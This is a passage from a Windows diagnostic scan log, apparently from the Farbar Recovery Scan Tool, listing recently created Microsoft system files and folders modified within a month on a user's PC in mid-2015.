2015-05-12 18:26 - 2015-04-27 15:16 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-synch-l1-1-0.dll
2015-05-12 18:26 - 2015-04-27 15:16 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-localregistry-l1-1-0.dll
2015-05-12 18:26 - 2015-04-27 15:16 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-localization-l1-1-0.dll
2015-05-12 18:26 - 2015-04-27 15:16 - 00003584 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-rtlsupport-l1-1-0.dll
2015-05-12 18:26 - 2015-04-27 15:16 - 00003584 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-processenvironment-l1-1-0.dll
2015-05-12 18:26 - 2015-04-27 15:16 - 00003584 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-namedpipe-l1-1-0.dll
2015-05-12 18:26 - 2015-04-27 15:16 - 00003584 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-misc-l1-1-0.dll
2015-05-12 18:26 - 2015-04-27 15:16 - 00003584 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-memory-l1-1-0.dll
2015-05-12 18:26 - 2015-04-27 15:16 - 00003584 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-libraryloader-l1-1-0.dll
2015-05-12 18:26 - 2015-04-27 15:16 - 00003584 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-heap-l1-1-0.dll
2015-05-12 18:26 - 2015-04-27 15:16 - 00003072 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-xstate-l1-1-0.dll
2015-05-12 18:26 - 2015-04-27 15:16 - 00003072 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-util-l1-1-0.dll
2015-05-12 18:26 - 2015-04-27 15:16 - 00003072 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-string-l1-1-0.dll
2015-05-12 18:26 - 2015-04-27 15:16 - 00003072 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-profile-l1-1-0.dll
2015-05-12 18:26 - 2015-04-27 15:16 - 00003072 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-io-l1-1-0.dll
2015-05-12 18:26 - 2015-04-27 15:16 - 00003072 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-interlocked-l1-1-0.dll
2015-05-12 18:26 - 2015-04-27 15:16 - 00003072 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-handle-l1-1-0.dll
2015-05-12 18:26 - 2015-04-27 15:16 - 00003072 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-fibers-l1-1-0.dll
2015-05-12 18:26 - 2015-04-27 15:16 - 00003072 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-errorhandling-l1-1-0.dll
2015-05-12 18:26 - 2015-04-27 15:16 - 00003072 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-delayload-l1-1-0.dll
2015-05-12 18:26 - 2015-04-27 15:16 - 00003072 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-debug-l1-1-0.dll
2015-05-12 18:26 - 2015-04-27 15:16 - 00003072 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-datetime-l1-1-0.dll
2015-05-12 18:26 - 2015-04-27 15:16 - 00003072 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-console-l1-1-0.dll
2015-05-12 18:26 - 2015-04-27 15:11 - 03989440 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntkrnlpa.exe
2015-05-12 18:26 - 2015-04-27 15:11 - 03934144 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntoskrnl.exe
2015-05-12 18:26 - 2015-04-27 15:08 - 01310744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntdll.dll
2015-05-12 18:26 - 2015-04-27 15:05 - 00635392 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tdh.dll
2015-05-12 18:26 - 2015-04-27 15:05 - 00259584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msv1_0.dll
2015-05-12 18:26 - 2015-04-27 15:05 - 00221184 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ncrypt.dll
2015-05-12 18:26 - 2015-04-27 15:05 - 00172032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wdigest.dll
2015-05-12 18:26 - 2015-04-27 15:05 - 00092160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sechost.dll
2015-05-12 18:26 - 2015-04-27 15:05 - 00065536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TSpkg.dll
2015-05-12 18:26 - 2015-04-27 15:05 - 00043008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\srclient.dll
2015-05-12 18:26 - 2015-04-27 15:05 - 00022016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\secur32.dll
2015-05-12 18:26 - 2015-04-27 15:05 - 00014336 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntvdm64.dll
2015-05-12 18:26 - 2015-04-27 15:04 - 00641536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\advapi32.dll
2015-05-12 18:26 - 2015-04-27 15:04 - 00550912 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kerberos.dll
2015-05-12 18:26 - 2015-04-27 15:04 - 00364544 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tracerpt.exe
2015-05-12 18:26 - 2015-04-27 15:04 - 00082944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\logman.exe
2015-05-12 18:26 - 2015-04-27 15:04 - 00040448 _____ (Microsoft Corporation) C:\Windows\SysWOW64\typeperf.exe
2015-05-12 18:26 - 2015-04-27 15:04 - 00037888 _____ (Microsoft Corporation) C:\Windows\SysWOW64\relog.exe
2015-05-12 18:26 - 2015-04-27 15:04 - 00025600 _____ (Microsoft Corporation) C:\Windows\SysWOW64\setup16.exe
2015-05-12 18:26 - 2015-04-27 15:04 - 00017408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\credssp.dll
2015-05-12 18:26 - 2015-04-27 15:03 - 01114112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kernel32.dll
2015-05-12 18:26 - 2015-04-27 15:03 - 00274944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KernelBase.dll
2015-05-12 18:26 - 2015-04-27 15:03 - 00096768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sspicli.dll
2015-05-12 18:26 - 2015-04-27 15:03 - 00050176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\auditpol.exe
2015-05-12 18:26 - 2015-04-27 15:03 - 00017408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\diskperf.exe
2015-05-12 18:26 - 2015-04-27 15:03 - 00005120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wow32.dll
2015-05-12 18:26 - 2015-04-27 14:59 - 00006656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\apisetschema.dll
2015-05-12 18:26 - 2015-04-27 14:59 - 00005120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-file-l1-1-0.dll
2015-05-12 18:26 - 2015-04-27 14:59 - 00004608 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-processthreads-l1-1-0.dll
2015-05-12 18:26 - 2015-04-27 14:59 - 00004096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-sysinfo-l1-1-0.dll
2015-05-12 18:26 - 2015-04-27 14:59 - 00004096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-synch-l1-1-0.dll
2015-05-12 18:26 - 2015-04-27 14:59 - 00004096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-misc-l1-1-0.dll
2015-05-12 18:26 - 2015-04-27 14:59 - 00004096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-localregistry-l1-1-0.dll
2015-05-12 18:26 - 2015-04-27 14:59 - 00004096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-localization-l1-1-0.dll
2015-05-12 18:26 - 2015-04-27 14:59 - 00003584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-processenvironment-l1-1-0.dll
2015-05-12 18:26 - 2015-04-27 14:59 - 00003584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-namedpipe-l1-1-0.dll
2015-05-12 18:26 - 2015-04-27 14:59 - 00003584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-memory-l1-1-0.dll
2015-05-12 18:26 - 2015-04-27 14:59 - 00003584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-libraryloader-l1-1-0.dll
2015-05-12 18:26 - 2015-04-27 14:59 - 00003584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0.dll
2015-05-12 18:26 - 2015-04-27 14:59 - 00003584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-heap-l1-1-0.dll
2015-05-12 18:26 - 2015-04-27 14:59 - 00003072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-string-l1-1-0.dll
2015-05-12 18:26 - 2015-04-27 14:59 - 00003072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-rtlsupport-l1-1-0.dll
2015-05-12 18:26 - 2015-04-27 14:59 - 00003072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-profile-l1-1-0.dll
2015-05-12 18:26 - 2015-04-27 14:59 - 00003072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-io-l1-1-0.dll
2015-05-12 18:26 - 2015-04-27 14:59 - 00003072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-handle-l1-1-0.dll
2015-05-12 18:26 - 2015-04-27 14:59 - 00003072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-fibers-l1-1-0.dll
2015-05-12 18:26 - 2015-04-27 14:59 - 00003072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-errorhandling-l1-1-0.dll
2015-05-12 18:26 - 2015-04-27 14:59 - 00003072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-delayload-l1-1-0.dll
2015-05-12 18:26 - 2015-04-27 14:59 - 00003072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-debug-l1-1-0.dll
2015-05-12 18:26 - 2015-04-27 14:59 - 00003072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-datetime-l1-1-0.dll
2015-05-12 18:26 - 2015-04-27 14:59 - 00003072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-console-l1-1-0.dll
2015-05-12 18:26 - 2015-04-27 14:06 - 00036864 _____ (Microsoft Corporation) C:\Windows\system32\UtcResources.dll
2015-05-12 18:26 - 2015-04-27 13:57 - 00007680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\instnm.exe
2015-05-12 18:26 - 2015-04-27 13:55 - 00006144 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-security-base-l1-1-0.dll
2015-05-12 18:26 - 2015-04-27 13:55 - 00004608 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-threadpool-l1-1-0.dll
2015-05-12 18:26 - 2015-04-27 13:55 - 00003584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-xstate-l1-1-0.dll
2015-05-12 18:26 - 2015-04-27 13:55 - 00003072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-util-l1-1-0.dll
2015-05-12 18:26 - 2015-04-21 22:28 - 00389840 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2015-05-12 18:26 - 2015-04-21 21:48 - 00342736 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iedkcs32.dll
2015-05-12 18:26 - 2015-04-21 13:14 - 24971776 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2015-05-12 18:26 - 2015-04-21 13:08 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2015-05-12 18:26 - 2015-04-21 13:07 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll
2015-05-12 18:26 - 2015-04-21 12:51 - 00066560 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2015-05-12 18:26 - 2015-04-21 12:50 - 00584192 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2015-05-12 18:26 - 2015-04-21 12:50 - 00417792 _____ (Microsoft Corporation) C:\Windows\system32\html.iec
2015-05-12 18:26 - 2015-04-21 12:50 - 00048640 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll
2015-05-12 18:26 - 2015-04-21 12:49 - 02885120 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2015-05-12 18:26 - 2015-04-21 12:48 - 00088064 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll
2015-05-12 18:26 - 2015-04-21 12:41 - 00054784 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2015-05-12 18:26 - 2015-04-21 12:40 - 00034304 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2015-05-12 18:26 - 2015-04-21 12:37 - 00633856 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2015-05-12 18:26 - 2015-04-21 12:35 - 00816640 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll
2015-05-12 18:26 - 2015-04-21 12:35 - 00144384 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2015-05-12 18:26 - 2015-04-21 12:35 - 00114688 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe
2015-05-12 18:26 - 2015-04-21 12:34 - 00814080 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll
2015-05-12 18:26 - 2015-04-21 12:31 - 06025728 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2015-05-12 18:26 - 2015-04-21 12:26 - 00968704 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe
2015-05-12 18:26 - 2015-04-21 12:25 - 02724864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb
2015-05-12 18:26 - 2015-04-21 12:24 - 19691008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2015-05-12 18:26 - 2015-04-21 12:22 - 00490496 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2015-05-12 18:26 - 2015-04-21 12:14 - 00077824 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll
2015-05-12 18:26 - 2015-04-21 12:11 - 00504320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll
2015-05-12 18:26 - 2015-04-21 12:11 - 00062464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iesetup.dll
2015-05-12 18:26 - 2015-04-21 12:10 - 00047616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieetwproxystub.dll
2015-05-12 18:26 - 2015-04-21 12:09 - 00341504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\html.iec
2015-05-12 18:26 - 2015-04-21 12:09 - 00199680 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll
2015-05-12 18:26 - 2015-04-21 12:08 - 00092160 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2015-05-12 18:26 - 2015-04-21 12:08 - 00064000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MshtmlDac.dll
2015-05-12 18:26 - 2015-04-21 12:05 - 00316928 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2015-05-12 18:26 - 2015-04-21 12:04 - 02278400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2015-05-12 18:26 - 2015-04-21 12:03 - 00047104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll
2015-05-12 18:26 - 2015-04-21 12:02 - 00030720 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iernonce.dll
2015-05-12 18:26 - 2015-04-21 12:00 - 00478208 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll
2015-05-12 18:26 - 2015-04-21 11:58 - 00664576 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript.dll
2015-05-12 18:26 - 2015-04-21 11:58 - 00115712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieUnatt.exe
2015-05-12 18:26 - 2015-04-21 11:57 - 00620032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9diag.dll
2015-05-12 18:26 - 2015-04-21 11:49 - 00801280 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2015-05-12 18:26 - 2015-04-21 11:49 - 00720384 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2015-05-12 18:26 - 2015-04-21 11:48 - 00418304 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtmsft.dll
2015-05-12 18:26 - 2015-04-21 11:47 - 01359360 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll
2015-05-12 18:26 - 2015-04-21 11:46 - 02125824 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2015-05-12 18:26 - 2015-04-21 11:43 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\JavaScriptCollectionAgent.dll
2015-05-12 18:26 - 2015-04-21 11:40 - 14401536 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2015-05-12 18:26 - 2015-04-21 11:39 - 00168960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msrating.dll
2015-05-12 18:26 - 2015-04-21 11:38 - 00076288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll
2015-05-12 18:26 - 2015-04-21 11:36 - 00285696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll
2015-05-12 18:26 - 2015-04-21 11:31 - 04305920 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2015-05-12 18:26 - 2015-04-21 11:27 - 02352128 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2015-05-12 18:26 - 2015-04-21 11:26 - 00688640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2015-05-12 18:26 - 2015-04-21 11:25 - 02052608 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl
2015-05-12 18:26 - 2015-04-21 11:24 - 01155072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmlmedia.dll
2015-05-12 18:26 - 2015-04-21 11:17 - 12828672 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2015-05-12 18:26 - 2015-04-21 11:15 - 01547264 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2015-05-12 18:26 - 2015-04-21 11:03 - 00800768 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2015-05-12 18:26 - 2015-04-21 11:02 - 01882112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2015-05-12 18:26 - 2015-04-21 10:58 - 01310208 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2015-05-12 18:26 - 2015-04-21 10:56 - 00710144 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dll
2015-05-12 18:26 - 2015-04-17 23:10 - 00460800 _____ (Microsoft Corporation) C:\Windows\system32\certcli.dll
2015-05-12 18:26 - 2015-04-17 22:56 - 00342016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\certcli.dll
2015-05-12 18:26 - 2015-04-12 23:28 - 00328704 _____ (Microsoft Corporation) C:\Windows\system32\services.exe
2015-05-12 18:25 - 2015-04-27 15:18 - 00146432 _____ (Microsoft Corporation) C:\Windows\system32\msaudite.dll
2015-05-12 18:25 - 2015-04-27 15:18 - 00060416 _____ (Microsoft Corporation) C:\Windows\system32\msobjs.dll
2015-05-12 18:25 - 2015-04-27 15:16 - 00686080 _____ (Microsoft Corporation) C:\Windows\system32\adtschema.dll
2015-05-12 18:25 - 2015-04-27 15:01 - 00146432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msaudite.dll
2015-05-12 18:25 - 2015-04-27 15:01 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msobjs.dll
2015-05-12 18:25 - 2015-04-27 14:59 - 00686080 _____ (Microsoft Corporation) C:\Windows\SysWOW64\adtschema.dll
2015-05-12 18:25 - 2015-04-27 13:57 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\user.exe
2015-05-12 18:25 - 2015-04-19 23:17 - 01647104 _____ (Microsoft Corporation) C:\Windows\system32\DWrite.dll
2015-05-12 18:25 - 2015-04-19 23:17 - 01179136 _____ (Microsoft Corporation) C:\Windows\system32\FntCache.dll
2015-05-12 18:25 - 2015-04-19 22:56 - 01250816 _____ (Microsoft Corporation) C:\Windows\SysWOW64\DWrite.dll
2015-05-12 18:25 - 2015-04-19 22:11 - 03204608 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2015-05-12 18:25 - 2015-04-07 23:29 - 00275456 _____ (Microsoft Corporation) C:\Windows\system32\InkEd.dll
2015-05-12 18:25 - 2015-04-07 23:29 - 00024576 _____ (Microsoft Corporation) C:\Windows\system32\jnwmon.dll
2015-05-12 18:25 - 2015-04-07 23:14 - 00216064 _____ (Microsoft Corporation) C:\Windows\SysWOW64\InkEd.dll
2015-05-12 18:25 - 2015-03-04 00:41 - 00342016 _____ (Microsoft Corporation) C:\Windows\system32\apphelp.dll
2015-05-12 18:25 - 2015-03-04 00:41 - 00072192 _____ (Microsoft Corporation) C:\Windows\system32\aelupsvc.dll
2015-05-12 18:25 - 2015-03-04 00:41 - 00023552 _____ (Microsoft Corporation) C:\Windows\system32\sdbinst.exe
2015-05-12 18:25 - 2015-03-04 00:41 - 00006656 _____ (Microsoft Corporation) C:\Windows\system32\shimeng.dll
2015-05-12 18:25 - 2015-03-04 00:11 - 00005120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\shimeng.dll
2015-05-12 18:25 - 2015-03-04 00:10 - 00295936 _____ (Microsoft Corporation) C:\Windows\SysWOW64\apphelp.dll
2015-05-12 18:25 - 2015-03-04 00:10 - 00020992 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sdbinst.exe
2015-05-12 18:25 - 2015-01-28 23:19 - 02543104 _____ (Microsoft Corporation) C:\Windows\system32\wpdshext.dll
2015-05-12 18:25 - 2015-01-28 23:02 - 02311168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wpdshext.dll
 
==================== One Month Modified files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2015-06-08 12:54 - 2014-02-27 02:35 - 00000000 ____D C:\Users\dell 2\AppData\Local\Battle.net
2015-06-08 12:19 - 2011-06-15 08:20 - 01048605 _____ C:\Windows\WindowsUpdate.log
2015-06-08 12:17 - 2012-07-22 15:11 - 00000000 ____D C:\Users\dell 2
2015-06-08 04:50 - 2014-03-17 02:17 - 00000000 ____D C:\Program Files (x86)\Steam
2015-06-08 04:34 - 2009-07-14 00:45 - 00031312 _____ C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2015-06-08 04:34 - 2009-07-14 00:45 - 00031312 _____ C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2015-06-08 04:28 - 2011-06-15 08:48 - 00000000 ____D C:\ProgramData\Sonic
2015-06-08 04:26 - 2011-08-12 18:58 - 00000000 ____D C:\ProgramData\VMware
2015-06-08 04:24 - 2012-07-22 14:52 - 00108125 _____ C:\Windows\setupact.log
2015-06-08 04:24 - 2009-07-14 01:08 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2015-06-08 04:23 - 2012-07-22 14:52 - 01848212 _____ C:\Windows\PFRO.log
2015-06-08 04:12 - 2012-07-22 13:29 - 00000000 ____D C:\Program Files (x86)\HandsFree
2015-06-08 03:58 - 2011-08-17 13:12 - 00000000 ____D C:\Program Files (x86)\Pidgin
2015-06-08 03:57 - 2012-07-21 15:06 - 00000000 ____D C:\ProgramData\Norton
2015-06-08 03:39 - 2014-12-10 05:59 - 00000000 ____D C:\Windows\system32\appraiser
2015-06-08 03:39 - 2014-05-07 03:01 - 00000000 ___SD C:\Windows\system32\CompatTel
2015-06-08 03:18 - 2014-07-25 04:40 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2015-06-07 18:52 - 2012-08-02 09:00 - 00000000 ____D C:\Users\dell 2\AppData\Roaming\Skype
2015-06-07 16:51 - 2011-08-20 19:14 - 00001945 _____ C:\Windows\epplauncher.mif
2015-06-07 16:48 - 2009-07-14 01:13 - 00999542 _____ C:\Windows\system32\PerfStringBackup.INI
2015-06-07 16:46 - 2012-08-21 14:10 - 00001236 _____ C:\Users\dell 2\Desktop\Norton Installation Files.lnk
2015-06-07 03:53 - 2013-02-20 19:10 - 00000000 ____D C:\Program Files (x86)\Google
2015-06-07 03:52 - 2014-05-13 07:02 - 00000000 ____D C:\Users\dell 2\AppData\Local\Deployment
2015-06-06 22:04 - 2013-02-13 19:32 - 00000000 ____D C:\Users\MSSQL$SQLEXPRESS
2015-06-06 21:55 - 2014-03-18 20:39 - 00000830 _____ C:\Windows\Tasks\Adobe Flash Player Updater.job
2015-06-06 19:55 - 2014-03-18 20:39 - 00003768 _____ C:\Windows\System32\Tasks\Adobe Flash Player Updater
2015-06-06 19:55 - 2013-08-04 10:19 - 00778416 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2015-06-06 19:55 - 2013-08-04 10:19 - 00142512 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2015-06-06 19:43 - 2012-07-22 15:12 - 00000000 ____D C:\Users\dell 2\AppData\Local\Adobe
2015-06-05 22:03 - 2015-03-11 17:23 - 00003138 _____ C:\Windows\System32\Tasks\FRAPS
2015-06-05 22:03 - 2015-01-13 14:38 - 00000000 ____D C:\Fraps
2015-06-05 21:40 - 2012-12-03 10:17 - 00000000 ____D C:\Program Files (x86)\Mozilla Thunderbird
2015-06-05 21:40 - 2009-07-13 23:20 - 00000000 ____D C:\Windows\PolicyDefinitions
2015-06-05 16:48 - 2012-08-09 11:37 - 00000000 ____D C:\Users\dell 2\AppData\Local\CrashDumps
2015-06-05 14:53 - 2010-11-21 03:16 - 00000000 ___RD C:\Users\Public\Recorded TV
2015-06-05 14:53 - 2009-07-14 00:45 - 05130120 _____ C:\Windows\system32\FNTCACHE.DAT
2015-06-05 14:49 - 2011-06-15 10:11 - 00000000 ____D C:\Windows\CSC
2015-06-05 13:53 - 2009-07-13 22:34 - 00000541 _____ C:\Windows\win.ini
2015-06-05 13:50 - 2011-02-10 10:33 - 01014702 _____ C:\Windows\SysWOW64\PerfStringBackup.INI
2015-06-05 13:26 - 2012-07-22 15:12 - 00134816 _____ C:\Users\dell 2\AppData\Local\GDIPFONTCACHEV1.DAT
2015-06-05 11:22 - 2013-05-02 18:21 - 00000000 ____D C:\Windows\system32\appmgmt
2015-06-05 02:56 - 2011-08-11 17:43 - 00000000 ____D C:\Users\Moncef Maiza
2015-06-05 02:56 - 2010-11-20 22:50 - 00000000 ____D C:\Users\Administrator
2015-06-05 01:13 - 2014-02-27 02:35 - 00000000 ____D C:\Program Files (x86)\Battle.net
2015-06-04 23:36 - 2014-02-27 02:35 - 00000000 ____D C:\Users\dell 2\AppData\Roaming\Battle.net
2015-06-04 23:36 - 2013-12-17 23:19 - 00000000 ____D C:\ProgramData\McAfee Security Scan
2015-06-04 23:36 - 2013-03-04 18:58 - 00000000 ____D C:\Users\DefaultAppPool
2015-06-04 23:36 - 2013-03-04 18:36 - 00000000 ____D C:\Users\localhost
2015-06-04 23:36 - 2013-02-11 20:23 - 00000000 ____D C:\Users\Classic .NET AppPool
2015-06-04 23:36 - 2009-07-13 23:20 - 00000000 ____D C:\Windows\system32\NDF
2015-06-04 23:36 - 2009-07-13 23:20 - 00000000 ____D C:\Windows\registration
2015-06-04 22:12 - 2009-07-13 23:20 - 00000000 __RSD C:\Windows\Media
2015-05-31 22:09 - 2015-04-19 20:23 - 00000000 ____D C:\ProgramData\Electronic Arts
2015-05-31 22:09 - 2009-07-14 01:32 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games
2015-05-31 22:08 - 2014-03-17 04:52 - 00000000 ____D C:\Users\dell 2\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Steam
2015-05-31 21:19 - 2012-07-24 16:31 - 00000000 ____D C:\Users\dell 2\AppData\Roaming\.purple
2015-05-31 19:33 - 2012-11-28 19:03 - 00009066 __RSH C:\Users\dell 2\ntuser.pol
2015-05-31 19:33 - 2011-06-15 08:29 - 00009374 __RSH C:\ProgramData\ntuser.pol
2015-05-30 16:45 - 2013-01-14 13:53 - 00000000 ____D C:\Users\dell 2\AppData\Roaming\Dropbox
2015-05-30 16:18 - 2013-01-14 13:57 - 00000000 ___RD C:\Users\dell 2\Dropbox
2015-05-30 13:24 - 2013-02-20 19:10 - 00000898 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2015-05-30 13:24 - 2012-08-20 14:58 - 00000912 _____ C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-1038277221-3604561771-2240411101-1006UA.job
